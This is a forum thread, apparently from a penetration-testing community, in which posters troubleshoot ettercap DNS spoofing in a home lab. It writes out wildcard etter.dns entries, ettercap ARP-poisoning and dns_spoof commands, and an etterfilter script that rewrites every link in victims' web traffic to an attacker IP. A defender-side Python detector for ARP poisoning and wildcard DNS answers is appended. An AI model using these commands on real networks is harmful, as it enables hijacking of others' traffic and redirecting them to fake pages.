
Thread: Dns Spoofing and ettercap [not working ?]

  1. #1
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    4

    Well, as you see, I'm new here. After reading a lot of threads in this forum (I like to use the search option before posting),
    and after about 2 weeks with this problem and no solution, I've decided to post my problem here.
    Now, maybe I didn't search well (which I don't think is the case... correct me if I'm wrong), but anyway, here is my problem.
    First of all, to clear things up: I test and try everything in my small "Lab".
    My attacker laptop is running BT4PF.
    My victim laptop is running Windows XP SP3.
    Well, my problem is this:
    I've tried to do DNS spoofing on my victim laptop, and it just won't work.
    The victim continues to surf as if I hadn't tried anything :P
    Now I've searched about it in this great forum (and I mean it!) and on Google;
    I didn't find any solution...
    I have to say that the ARP spoofing attack worked fine!
    But when it's spoofed, it only inserted my code in a small part at the top of the site, and I don't want that; I want it to be on the whole browser screen.
    This is why I chose DNS spoofing, which redirects any request of the victim to my machine (which is running an Apache server and a nicely configured index.html).

    What I did was this:
    First I edited:
    /user/share/ettercap/etter.dns
    I inserted there:
    * A 192.168.168.xxx (attacker IP)
    And started the ettercap DNS attack with the command:
    ettercap -T -q -i wlan0 -P dns_spoof -M arp /target1/ /target2/
    ...It didn't work.
    I tried to change the dns.conf with this example from the internet (just to test):
    cnn.com A 212.58.224.138
    *.cnn.com A 212.58.224.138
    It didn't work either...
    What did I do wrong?
    Please help me solve this.
    Thank you for reading, and I'll appreciate ANY help.
    Sil3nce.

  2. #2
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    4

    -- O.o double post ? -- the post below is the correct one .. --

  3. #3
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    4

    Well, I found a nice solution, but it's still not what I need.
    The solution is to use an ettercap filter to redirect any link to my attack machine.
    Simply put, I found a nice tutorial by BigMac, which I used.
    The tutorial is here: hxxp://forums.remote-exploit.org/tutorials-guides/15551-fast-track-mass-client-attck-ettercap.html

    What I did was:

    First, create a new filter:

    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("a href=", "a href=\"hxxp://192.168.168.xxx\" ");
       replace("a href=", "a href=\"hxxp://192.168.168.xxx\" ");
       msg("Filter Ran.\n");
    }
    Then:

    Code:
    etterfilter filter.filter -o filter.ef
    And in the same folder:

    Code:
    ettercap -T -q -i wlan0 -F filter.ef -M ARP /target1/ /target2/
    It is working, but I'm interested in DNS spoofing, so if anyone can help me solve my problem, I'll appreciate that.
    Thank you.
    Sil3nce.

  4. #4
    mcurran
    Guest

    sil3nce:

    Can you still confirm the redirect filter is working on the XP [SP3] machine? I have an XP [SP3] VM inside my BT4 HD install, but neither IE8 nor Firefox shows any effect from targeted ettercap filters from the host. All my other targets get redirected, but not the XP machine for some reason. Maybe it's a new update with XP [SP3], but I'm not sure. Anyone else know why this updated OS is not being affected? I'm going to try DNS spoofing and I'll come back and confirm whether or not that works too...

  5. #5
    Just burned his ISO
    Join Date
    Jan 2010
    Location
    /
    Posts
    16

    Try

    cd /usr/share/ettercap/
    mv -f etter.dns etter.dns.old
    kate etter.dns
    * A 192.168.1.7 (attacker IP)

    Then run

    ettercap -i wlan0 -T -q -P dns_spoof -M ARP /gateway IP/ /Victim IP/

    You will also need to have Apache running with the fake web page that you want to be displayed.

    Hope this helps

  6. #6
    mcurran
    Guest

    Quote: Originally posted by W@r~l0RD
    Try

    cd /usr/share/ettercap/
    mv -f etter.dns etter.dns.old
    kate etter.dns
    * A 192.168.1.7 (attacker IP)

    Then run

    ettercap -i wlan0 -T -q -P dns_spoof -M ARP /gateway IP/ /Victim IP/

    You will also need to have Apache running with the fake web page that you want to be displayed.

    Hope this helps
    Yes, I already have my index.html dummy page and I have it working. I also have *.*.*.* A 192.168.1.2 (LHOST IP), in my etter.conf, which is essentially the same thing. I know my setup works, because I can test it on all my other test client machines (targets), but for some reason IE8 and Firefox don't get redirected on my XP Service Pack 3 (virtual guest). Their displayed pages get all messed up and sometimes fail to load, but they never get redirected like the other targets, which all seem to work very smoothly. It even works when I go to my own IP to test from the LHOST machine.
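
A defender-side check for the two techniques this thread combines, ARP poisoning and a wildcard `* A <LAN IP>` DNS answer, as an added example that is not part of the original posts. The neighbour-table and DNS-answer line formats, the MAC addresses, and the gateway address 192.168.1.1 are constructed assumptions for illustration.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample data (not from the thread): neighbour table and resolver answers.
ARP_TABLE = """\
192.168.1.1 aa:bb:cc:00:00:07
192.168.1.7 aa:bb:cc:00:00:07
192.168.1.20 aa:bb:cc:00:00:20
"""
DNS_ANSWERS = """\
cnn.com A 192.168.1.7
www.example.org A 192.168.1.7
mail.example.net A 192.168.1.7
intranet.lan A 192.168.1.50
dns.google A 8.8.8.8
"""

def duplicate_macs(arp_text):
    """Return {mac: [ips]} for MACs claimed by more than one IP (ARP-poisoning indicator)."""
    by_mac = defaultdict(list)
    for line in arp_text.splitlines():
        m = re.fullmatch(r"\s*(\S+)\s+([0-9a-fA-F:]{17})\s*", line)
        if m:
            by_mac[m.group(2).lower()].append(m.group(1))
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}

def wildcard_suspects(dns_text, min_names=3):
    """Return {ip: [names]} where at least min_names distinct names share one private address."""
    by_ip = defaultdict(set)
    for line in dns_text.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[1] == "A":
            name, ip = parts[0].lower().rstrip("."), parts[2]
            try:
                if ipaddress.ip_address(ip).is_private:
                    by_ip[ip].add(name)
            except ValueError:
                continue  # malformed address: skip the line
    return {ip: sorted(n) for ip, n in by_ip.items() if len(n) >= min_names}

def correlate(arp_text, dns_text):
    """IPs flagged by both checks: the address names resolve to also shares a MAC with another IP."""
    poisoned_ips = {ip for ips in duplicate_macs(arp_text).values() for ip in ips}
    return sorted(set(wildcard_suspects(dns_text)) & poisoned_ips)

if __name__ == "__main__":
    print(correlate(ARP_TABLE, DNS_ANSWERS))
```

Either signal alone can have a benign cause (a captive portal, a host with several addresses); the two together on one LAN address are what warrant investigation.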
